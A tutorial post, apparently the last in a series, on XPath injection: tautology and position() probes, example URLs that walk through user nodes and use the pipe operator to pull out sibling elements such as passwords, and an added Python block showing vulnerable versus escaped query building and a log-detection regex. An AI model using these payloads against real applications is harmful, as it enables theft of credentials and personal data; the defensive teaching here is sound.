Xpath Injection (Final)

July 8, 2015 | Views: 3195


1. Testing and confirming Xpathi

Testing for Xpath and confirming it are the most important parts. Most of us, and especially the readers of securityidiots, see SQLi everywhere and anywhere they find an error, even if the error is a Conversion Error, Internal Error or Programming Error. Sometimes, people assume that getting blocked by a WAF upon typing “Union Select” means the target is vulnerable to SQLi.

When we see an input field, the first thing we’ll do is make the condition true using the tests below:

1 or 1=1
1 or true
' or ''='
" or ""="

In the case of Xpath, SQLi and many other injections, these tests will behave the same way, so they don’t tell the two apart. To confirm that it’s Xpathi, we can use the position() function, which is specific to Xpath. Here are a few tests we can try:

1 or position()=1 or 1=1
1 or position()=1 or true
' or position()=1 or ''='
" or position()=1 or ""="

If any of the above works, then you can assume that the injection you are dealing with is an Xpath Injection. Below is an example XML file, which we’ll be using throughout this tutorial:


<xmlfile>
<users>
	<user>
		<name first="example" last="example"/>
		<id>1</id>
		<username>Test</username>
		<password>T</password>
		<phone>123-456-7890</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>2</id>
		<username>example</username>
		<password>i_om-GAWWWD</password>
		<phone>603-478-4115</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>3</id>
		<username>example</username>
		<password>ihavemoregfsthanyou</password>
		<phone>222-222-2222</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>4</id>
		<username>example</username>
		<password>SelectPassFromDual</password>
		<phone>88-777-8989</phone>
	</user>
</users>
</xmlfile>


Here are some basic Xpath queries, which can be used to extract data from the above file:

To Extract username where id=1
/xmlfile/users/user[id='1']/username
To Extract username where id=2
/xmlfile/users/user[id='2']/username
To Extract password where username is Monster
/xmlfile/users/user[username="Monster"]/password
To Extract phone where username is Trojan and password is ihavemoregfsthanyou
/xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone
To Extract the first username
/xmlfile/users/user[position()=1]/username


Looking at the example queries above, the basic way of extracting data using Xpath queries should now be clear: the predicate in square brackets selects a user node, and the final step names the child element to return.


2. Iterating through the Nodes

Let’s try injecting it with Xpath. Before we start injecting, let’s assume the query that could be working inside. It should be something like /root/something/user[username='<Our_Input_here>']/phone. Assuming this, let’s try these injections:

http://example.net/challenge1/challenge_2.php?username='or''='
And we got the phone number of the first user. Now, to get the number of the second user, we’ll use position() as I used above:
http://example.net/challenge1/challenge_2.php?username='or position()=2 and''='
And we got the number of the second user. We can keep changing position() to get the rest of the users’ phone numbers.
http://example.net/challenge1/challenge_2.php?username='or position()=3 and''='
And we got the number of the third user; keep changing position() in the same way to get the rest of the users’ phone numbers.

We’re done iterating through the nodes, but the problem is that we aren’t able to extract the other details, like passwords, which must be saved in the same XML file.


3. Extracting Data from Siblings

Until now, we were using position(). We’re able to enumerate the nodes only, but the /phone at the end is hard-coded; we can’t change it to extract other data. But fear not!! We have the pipe operator, which combines two queries in Xpath. The trailing |/a[' turns the hard-coded ']/phone into a second, empty query, so the result is only the element we selected. Here’s how we can do this:

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above Injection extracts the Second Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above Injection extracts the Third Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above Injection extracts the Fourth Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above Injection extracts the Fifth Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here I changed the position, which means it will extract the second element of the second node; you can keep changing both indexes and extracting.
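As an added example (not code from the post or the challenge), here is how the server-side query the post assumes in sections 2 and 3 would be assembled from those probes, beside the safe XPath 1.0 literal construction that keeps the same input inert, and a constructed pattern for spotting these probe shapes in logs:

```python
import re

# Query shape the post assumes for the challenge page, applied to its XML:
# the username lands inside a single-quoted literal and /phone is fixed.
QUERY_TEMPLATE = "/xmlfile/users/user[username='{}']/phone"

# Probe shapes used in this post: position() test, ]/*[n] sibling pivot,
# | union and the ' or ''=' tautology. Constructed pattern for log triage.
XPATHI_PATTERN = re.compile(
    r"position\s*\(\s*\)|\]\s*/\*\s*\[|\|\s*/|(['\"])\s*or\s*\1\1=", re.I
)

def build_query_unsafe(user_input: str) -> str:
    """Vulnerable: raw input is spliced into the literal, so a quote ends it."""
    return QUERY_TEMPLATE.format(user_input)

def xpath_string_literal(value: str) -> str:
    """XPath 1.0 literal that always denotes exactly `value`.

    XPath 1.0 has no escape sequence inside literals: a value with a single
    quote must be double-quoted, and one with both kinds is split on ' and
    rejoined with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")  # no part contains a single quote any more
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")  # the single quote that was split out
    return "concat(" + ", ".join(pieces) + ")"

def build_query_safe(user_input: str) -> str:
    """Hardened: input is embedded as one literal, never as XPath syntax.

    Prefer variable binding where the engine has it (lxml: xpath(expr, u=v));
    this escaping is for engines without it, such as PHP's DOMXPath.
    """
    return f"/xmlfile/users/user[username={xpath_string_literal(user_input)}]/phone"

def looks_like_xpathi(user_input: str) -> bool:
    """True if the input carries one of the probe shapes shown in this post."""
    return XPATHI_PATTERN.search(user_input) is not None
```

Feeding the section 3 probe through build_query_unsafe shows the union query the post describes; build_query_safe turns the same probe into a username lookup for a literal string that matches nothing.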

Using this, we can extract data with zero knowledge of the internal file structure. Here’s an Xpathi challenge you can try, using the above method:


Thanks for reading this series of posts!
